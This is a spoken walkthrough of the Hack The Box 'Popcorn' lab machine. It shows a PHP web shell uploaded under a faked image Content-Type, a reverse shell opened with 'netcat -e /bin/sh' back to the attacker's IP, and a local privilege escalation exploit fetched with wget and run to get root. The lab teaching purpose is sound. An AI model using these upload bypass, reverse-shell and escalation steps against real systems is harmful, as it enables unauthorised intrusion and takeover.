All right, guys. So in the beginning of this, you're going to see this site here. It's going to be under HTB torrent. You'll learn this by having done Dirbuster and checking in-map scans for port, and then running Dirbuster to find torrent is being hosted. And of course, you're going to have to, in order to get here, you're going to have to go to your etc host file. So sudo nano etc host Kelly. And you can see I have my IP address for the victim, 10.10.10.6 popcorn.htb. And when you do that, input that control O, control X, control, actually, control Q. God, sorry. So control O, gotcha, control X. All right, control X. Okay, so now that we have that, you should be able to navigate to this site here. Once you get to this site, what you're going to do is I am just going to open up a new directory as if we are starting from the beginning. I'm going to go to log out. See, it's logging me out. You're going to go to register, and you can't really brute force this. So register, create your user, create a password, confirm the password, create a funky email. Dan@gmail.com works for me. And then put in the numbers here and register a user. Once you register, log in like you would any other site. Come here, and then you have the ability to upload files. You're going to upload, I'll log in here. You're going to upload a torrent file. So you can download torrent file. You can go to Kelly image. Yeah, here we go. So then scroll down, and then here you can see it's giving you this torrent option. So you download this torrent, right? Download this torrent. This one's 4 gigs, but the torrent is really small. So when I download, whatever torrent you want, you can download this one. You can see it downloads very quickly. And if you look at the file extension, it's a .torrent. So then you upload that to burp here. Upload that. Choose the file. Mine was in downloads, torrent. It doesn't matter as long as it's .torrent and it's got that in the extension. Magic Bytes might, and the content type might still restrict you to making sure that is actually a torrent file. Put in tests, just random number name, upload the file. It's already exists in the database, but if you had one, it would upload. And then you go to browse, so I already have one there. And I have test.3, that's the one I uploaded beforehand. And you can see it has this edit this torrent image, and you could go here, and this is what we're going to be messing with in the next portion here. All right, so you have this torrent site that allows you to upload files and images. You can see here it allows you to change the screenshot for the icon. And if I go here, I have my intercept on, so I'm intercepting all the requests between my browser and that server. I'm going to forward it. Here I have the option to upload a file. Now, because this is a Linux server and it's got PHP as its backend language, that means I could choose file, and instead of uploading a image like a PNG file or JPEG, I'm going to upload a exploit that has PNG in the name of it, but isn't actually a PNG file. So if I select it, great. Next, I'm going to go ahead and submit this. And here you can see it's showing me the request that I'm about to send to the server. I can actually edit this request before it reaches the server. So let's go ahead and edit that. So instead of indicating this is a application and this is a PHP file, we're going to say, hey, server, this is an image and it's a PNG. So it's not a malicious PHP file, it's image and it's a PNG file. All right, great. So the server thinks this is an image, but it's not. It's actually it has a PHP script in it that will echo and a system command that will allow us to run commands once we query this, and we'll query this variable there. So we'll go ahead and forward it. All right, great. See if it sent. It did. All right, so now that we know that it sent the file to the server, we can go here and check to see if the file is here. So I'll go ahead and forward that. And the file should be here. Go ahead and check to see the one that I've sent most recently. And it's going to be so probably, oh, it's still loading. Give it one more sec while it loads. All right, well, while that's loading, I'll go ahead and duplicate this tab here. Go here. All right, and we know the file is right up. .png.php. Go ahead and do a question. Let me go ahead and turn intercept off. So the question followed by what the server will do. So in this case, it will run the cmd equals netcat -e /bin/sh. And then we'll put in the IP address and the port. So you can see our host is 10.10.14.63. 1463, and we'll be listening on port 444 over here. And right here, I'll just open this up. Oh, that's not what we wanted. We wanted this file here. All right, so this is going to be our listener. So go ahead and spin up a listener. Okay. Okay, so now we got our listener running. Go and grab this in case I need to run it again. Don't want to have to retype that. Run it, and it's saying it's not there. So what we're gonna have to do is check my spelling. All right, now it's saying it's not found. Right up, .png, PHP. Looks like I got an error. So I have to figure out why I'm getting an error here. See if my proxies maybe causing that. Here we go. All right, this is the file that we uploaded, this one right here. And you can see that the name has changed for it. And it looks like it's having an issue with it. So let's go ahead and take that name. Let's see if we can run it now. If I run it, come over here, you can see that I have a connection. So I can type in who am I, give that a second, and it says we're www data. Okay, so I could do pwd print working directory, and you can see I'm in the server, and this is in the var www torrent uploads. You see that it's spinning, and that spinning says file not found. That was from the previous request. It's spinning because it has a connection, and once it stops spinning, that doesn't mean our connection dies. Our connection continues. It's just sending the request, and it's realizing this is running PHP code that's initiating this connection. Okay, so now the server, what it did was it ran this PHP script, and the PHP script, when we pass it this command, right, it, it had a variable CMD in it, and that CMD will execute whatever we specify here. So I'm telling it to connect to uh, our remote host here, or, which we would say as lhost, for the local host, my Kali machine. And when it connected, then I got the connection. All right, so from here, we notice that um, we have access, but we don't have a good shell, right? Because all you see is that blinking cursor there. So if I type in this command here, it will spawn a shell similar to what you typically see in a terminal. So now you see the cache symbol there. So when I type pwd, it's just a more interactive shell. All right, great. Now that we have its interactive shell, the next thing we're going to do is try to find an exploit to escalate our privileges. So just because you have access to this machine does not mean you have access to everything. You're limited to www, which typically um, has limited access. So you want full access. In order to do that, you have to escalate privileges. If we run this command here, we'll see the version of Ubuntu that's currently being run. That's going to be lsb /release space -a. And here you can see that it's Ubuntu 9.10. Okay, so great. If you go into the search exploit and you're looking for Ubuntu 9.10, you're going to see that they have this one, the Linux PAM. And it's a MOTD, message of the day, um, file tampering privilege escalation. All right, so here they've got the file, and so we can go ahead and upload this and try to run it. All right, so now that we know that this exploit exists, we're going to use chmod, or actually before that, rewind, search exploit -m, and the name of the file that will get it downloaded to our directory, and then chmod +x that will ensure that it is executable. But next we need to get it um, over to the victim. So in order to do that, we're gonna have to web server it over. So we're gonna serve up a web server, and then from the Linux box, get the file and then run it. Okay, we'll go ahead and run this command. Let's go ahead and start up the web server. All right, and now we'll go over here and we will grab that file. There's different ways we can get it. wget is probably the easiest. I hope it's installed on this one, but I guess we'll see. So I'll go ahead and put in my localhost 63, and then the name of the file, which is here, and grab that, come over here, drop that in there, put that there. All right, and then we'll go ahead and run it. So you can see it connected and it refused the connection because I am stupid. Because I did not specify the port number, which is 8,000. For you, it would probably not do that because if you're using the default port, it might work. But for me, it did not work. All right, now that it worked, we'll go ahead and do ls. Now, there is an issue right now. We are running this from this directory. Not sure if we're supposed to run this from temp. Let me check here. Yeah, no, we're good here. Okay, cool. So pwd uploads. We might want to put in the www. So let me go back a few directories here and run that same command. All right, ls pwd, go back one more. All right, cool. So now we will run that command just because I want to get in this directory and this directory only. So what's this one? Yeah, it's this one. All right, cool. So we'll grab that. Go over here, drop that command in here. All right, cool. It's here now. So ls, and there it is. So chmod was x 14339.sh. That makes sure it's executable on this machine. All right, great. Now that we know that's executable, go ahead and run it. So 14339.sh, and it's running. So now it's asking for a password. We'll go ahead and put in Tor. All right, cool. So now that that's run, we are, haha, popcorn, root popcorn. So we are root. So we could say, who am I? Root. Great. All right, so we'll go ahead and cat. All right, actually, go back a few directories. ls. And here we can see we're in this directory, so cd into the root directory, ls, and there's the flag. And if you type this in, you'll get the flag. Now, I can't share the flag because Hackbox policy. All right, the user flag, that one's in the home directory. So what I'll do is show you where it's at without showing you what it is. So if I cd backpack, cd home, ls, cd George, ls, cat user.txt, that will get me the user flag. All right, so that's how you get them, and that should be it.